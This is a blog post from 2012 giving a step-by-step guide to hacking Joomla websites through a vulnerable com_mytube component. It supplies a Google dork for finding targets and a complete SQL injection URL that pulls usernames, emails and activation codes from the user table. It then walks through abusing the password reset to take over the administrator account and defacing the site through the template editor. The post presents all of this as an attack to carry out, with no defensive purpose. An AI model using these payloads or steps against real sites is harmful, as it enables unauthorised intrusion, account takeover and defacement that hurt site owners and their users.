Pages

Tuesday, 12 June 2012

Hacking Joomla Website


Hacking Joomla Website

Hey all today i will tell you all how to hack joomla websites.Ok so thereare are different ways to hack a Joomla based website ...But today i will tell you all one of the finest way to hack Joomla websites.


Introduction To Joomla


Joomla as Stable-Full Package is probably unhackable and If someone tells that HACKED Joomla, talking rubbish___!!!!!!!

But people still hacked sites that use Joomla as Content Management System?

Joomla is made of components and modules and there are some developers apart from official team that offer their solutions to improve Joomla. That components and modules made by that other developers are weak spots and thus make it vulnerable and hackable.

                                                         Finding Exploit and Target

First Of all you input this

Google Dork :

inurl:"option=com_mytube"

enter this dork in Google search box...

Next is injecting the target

See for this URL:

http://targetsite.com/index.php?option=com_mytube&Itemid=88...

Now You have to replace the url something like below

http://targetsite.com/index.php?option=com_mytube&Itemid=88&view=videos&type=member&user_id=62+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,10,11,concat%280x3a,username,0x3a,email,0x3a,activation%29,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users+where+id=62--
If our target site is vulnerable then we can see something like below image




In above image we can see username, email and activation code.

Now let this page opened and open new page.

                                                       Admin password reset

Go to:
http://www.targetsite.com/index.php?option=com_user&view=reset
This is standard Joomla query for password reset request

                    
Ok now type the email adress found in above steps and submit it
The activation code should be resetted.

Return to the first page, refresh the page and take the new activation code.

Paste him in the token and press Submit.

problem with token_______!!!!!!

UPDATE: Joomla! 1.5.16 now hashes the reset token

if you see a thing like :$1$14411: after the activation code, it will not work.
Admin Login

If you done everything ok, your Password page will load. Enter your new password...


After that go to:

http://www.targetsite.com/administrator/




Standard Joomla portal content management system

Enter the username  and your new password, click on Login

Go to Extensions >> Template Manager >> Default Template Name >> Edit HTML

In Template HTML Editor insert your defaced code, click Apply, Save and you are done!!!

Now you are successfully done.

0 comments:

Post a Comment